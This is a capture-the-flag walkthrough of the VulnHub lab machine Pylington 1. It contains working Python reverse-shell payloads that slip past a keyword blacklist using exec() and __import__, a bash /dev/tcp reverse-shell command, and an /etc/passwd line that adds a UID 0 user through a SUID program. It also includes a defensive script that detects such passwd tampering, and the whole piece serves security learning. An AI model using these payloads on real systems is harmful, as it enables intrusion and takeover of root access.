NepCodeX

Byte Musings: Where Tech Meets Curiosity


Pylington 1 Walkthrough – Vulnhub – Writeup


In this post I am going to walk through a fun machine from VulnHub: Pylington 1 by Peter Ye.

Link to Pylington 1: https://www.vulnhub.com/entry/pylington-1,684/

Writeup

Identify target

The first step is to find the target on the local network.

fping -aqg 10.0.2.0/24

Scan open ports

Next, scan for open ports; those services are where we will look for vulnerabilities. The scan below covers all TCP ports (-p-), runs the default scripts (-sC) and detects service versions (-sV).

nmap -T4 -p- -sC -sV --min-rate=1000 10.0.2.20

The scan revealed an unusual path on the HTTP server.

Extract information from HTTP server


It looks like I found a username and password to log in to the web application.


It looks like we can execute Python code through the website; however, the page refuses code that contains certain words.


I will try to get a reverse shell with Python without using the blocked words import, os and open. First, I listen on a port with netcat on my local machine.

nc -nlvp 4444

Normally, the Python code to get the shell would be the following.

import os,pty,socket;s=socket.socket();s.connect(("10.0.2.15",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")

However, we cannot use the words import or os in the submitted text. So we have to build those words as strings at run time. Luckily, Python allows that: exec() executes a string as Python code, and that string is only assembled after the filter has already inspected what we submitted. So I have to modify the code accordingly.

i="imp"+"ort";o="o"+"s";exec(f'bs=__{i}__("{o}");pty=__{i}__("pty");socket=__{i}__("socket");s=socket.socket();s.connect(("10.0.2.15",4444));[bs.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')

In the above code I avoided the keywords import and os. The import statement is just syntax over the builtin function __import__: for example, import math is the same as math = __import__('math'). So I split the word import into imp and ort, concatenated them and stored the result in the variable i, and did the same for the module name os in the variable o. I also bound the os module to a variable called bs, since the name os itself is blocked. The f-string substitutes the real names just before exec runs the assembled code. Now, let's run the code.

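To make the bypass concrete, here is an added example (my own code, not part of the original writeup or the challenge): a toy keyword blacklist modelled on what the page appears to apply to submitted Python, a naive submission that it rejects, and the same logic rewritten with concatenated fragments and __import__ inside exec(), which it accepts. The exact filter on the machine is not known; the blocked words and the endpoint model are assumptions, and the payload does something harmless (a path operation via the os module) rather than spawning a shell.

```python
# Added example, not code from the original writeup. It models the kind of
# keyword blacklist the challenge page appears to apply to submitted Python
# (the real filter is not known; the words below are assumed from the writeup)
# and shows why building the blocked words at run time and feeding them to
# exec() gets past it.

BLOCKED_WORDS = ("import", "os", "open")   # assumed blacklist


def filter_rejects(code: str) -> bool:
    """True if the submitted source text contains any blocked word (substring match)."""
    return any(word in code for word in BLOCKED_WORDS)


# Straightforward submission: rejected, because the literal words are in the source.
NAIVE_PAYLOAD = 'import os\nresult = os.path.basename("/root/root.txt")'

# Same effect with no blocked word in the source text: "import" and "os" are
# assembled from fragments, and the f-string substitutes them only when the
# submitted code is already running, i.e. after the filter has looked at the text.
# The os module is bound to the name bs because the name "os" itself would be flagged.
BYPASS_PAYLOAD = (
    'i = "imp" + "ort"\n'
    'o = "o" + "s"\n'
    'exec(f\'bs = __{i}__("{o}"); result = bs.path.basename("/root/root.txt")\')'
)


def run_submission(code: str) -> dict:
    """Mimic the challenge endpoint: refuse blocked text, otherwise exec it and
    return whatever value the code left in the name `result`."""
    if filter_rejects(code):
        return {"error": "blocked"}
    namespace: dict = {}
    exec(code, namespace)  # deliberately executes the submitted code, as the challenge does
    return {"result": namespace.get("result")}


if __name__ == "__main__":
    print(run_submission(NAIVE_PAYLOAD))    # {'error': 'blocked'}
    print(run_submission(BYPASS_PAYLOAD))   # {'result': 'root.txt'}
```

The defensive lesson is that a substring blacklist over source text does not constrain Python at all: __import__, getattr, exec, eval and the builtins table offer many routes to the same modules. Either do not execute user-supplied code, or confine it at the process and OS level (separate user, seccomp or container, no network), not at the text level.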

Finally, I got a shell as the user http. Next, I found the home directory of the user py.


In the home directory of py, I found a SUID binary owned by py, which means it runs with py's privileges no matter who executes it.


After playing a simple game with the binary, I found a password and used it to log in as py over SSH, since a proper SSH session is nicer to work in than the reverse shell.


Root privilege escalation

There was another SUID program, named backup, inside the secret_stuff directory. So I ran it to see what it does.


It appears to append a line to the end of a file we choose, and because it is SUID root it does so with root's privileges. So we can abuse it to add a new UID 0 user to /etc/passwd. First, generate a password hash with openssl.

openssl passwd -1 -salt N3PC0D3X.C0M nepcodex.com

This produces an MD5-crypt hash (the $1$ prefix). Note that openssl keeps only the first 8 characters of the salt for this format, which is why the hash below carries N3PC0D3X rather than the full string I passed. Now I can craft a line to add to the /etc/passwd file as follows (the fields are name, password hash, UID 0, GID 0, empty GECOS, home directory and shell).

nepcodex:$1$N3PC0D3X$26serhpqJW9UQGuodci2L/:0:0::/root:/bin/bash

For the target file, I used a relative path with .. to walk up from the program's working directory to /etc/passwd (.. means the parent directory, whereas . means the current directory).

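As an added example (my own code, not part of the original writeup), the following assembles the /etc/passwd entry that the backup program is abused to append and then shows the check a defender would run afterwards to catch exactly this kind of tampering: any UID 0 account other than root, or any entry carrying a hash (or nothing) in the password field instead of the x that points to /etc/shadow. The hash is the one the page generated with openssl; the sample passwd content is constructed for the example and is not a capture from the machine.

```python
# Added example, not part of the original writeup. Builds the passwd entry
# that the SUID backup program is abused to append, and the check a defender
# can run afterwards to spot such an entry. The hash is the one the page
# generated with openssl; the sample passwd text is constructed here.

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# Password-field values that mean "hash lives in /etc/shadow" or "no password login".
SHADOWED = ("x", "*", "!", "!!")


def build_passwd_line(name, pw_hash, uid=0, gid=0, gecos="", home="/root", shell="/bin/bash"):
    """Assemble one 7-field passwd entry, refusing values that would corrupt the file."""
    for value in (name, pw_hash, gecos, home, shell):
        if ":" in value or "\n" in value:
            raise ValueError(f"passwd field may not contain ':' or newline: {value!r}")
    return f"{name}:{pw_hash}:{uid}:{gid}:{gecos}:{home}:{shell}"


def parse_passwd(text):
    """Parse passwd-format text into a list of dicts; malformed lines raise."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            raise ValueError(f"malformed passwd line: {line!r}")
        entry = dict(zip(PASSWD_FIELDS, parts))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entries.append(entry)
    return entries


def rogue_superusers(text):
    """Names of accounts that are UID 0 but not root, or whose password field
    holds a hash (or is empty) instead of a shadow marker. Either one is a
    sign of the /etc/passwd tampering shown in this writeup."""
    suspicious = []
    for entry in parse_passwd(text):
        uid0_alias = entry["uid"] == 0 and entry["name"] != "root"
        inline_hash = entry["passwd"] not in SHADOWED
        if uid0_alias or inline_hash:
            suspicious.append(entry["name"])
    return suspicious


# Constructed sample resembling the machine's users (not a real capture).
CLEAN_PASSWD = """root:x:0:0:root:/root:/bin/bash
py:x:1000:1000::/home/py:/bin/bash
http:x:33:33::/srv/http:/usr/bin/nologin
"""

# The line appended through the backup program, using the hash from the page.
NEW_LINE = build_passwd_line("nepcodex", "$1$N3PC0D3X$26serhpqJW9UQGuodci2L/")
TAMPERED_PASSWD = CLEAN_PASSWD + NEW_LINE + "\n"

if __name__ == "__main__":
    print(NEW_LINE)
    print("clean:", rogue_superusers(CLEAN_PASSWD))        # []
    print("tampered:", rogue_superusers(TAMPERED_PASSWD))  # ['nepcodex']
```

On a live system the same check is a one-liner, for example awk -F: '$3 == 0 || $2 !~ /^[x*!]/' /etc/passwd, and it belongs in any post-compromise triage alongside a look at the mtime of /etc/passwd and at SUID binaries that write to files named by the caller.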

Switching to the new user gave me root access, and now I can read the flag as well.

cd /root
cat root.txt

Conclusion

I loved this machine; it was a lot of fun. One point to note is that I wrote a rather long command to get the reverse shell. A shorter alternative would have been os.system("bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"). It is perfectly valid, but it may not always work; for example, it didn't work on my system. A likely cause is that os.system() hands the string to /bin/sh -c, and both the >& redirection form and the /dev/tcp pseudo-device are bash features, so on a system where /bin/sh is dash the command fails before bash ever starts; wrapping the whole command as bash -c '...' avoids that. You can replace the code with the following command to see whether it works for you.

i="imp"+"ort";o="o"+"s";exec(f'__{i}__("{o}").system("/bin/bash -i >& /dev/tcp/10.0.2.15/4444 0>&1")')


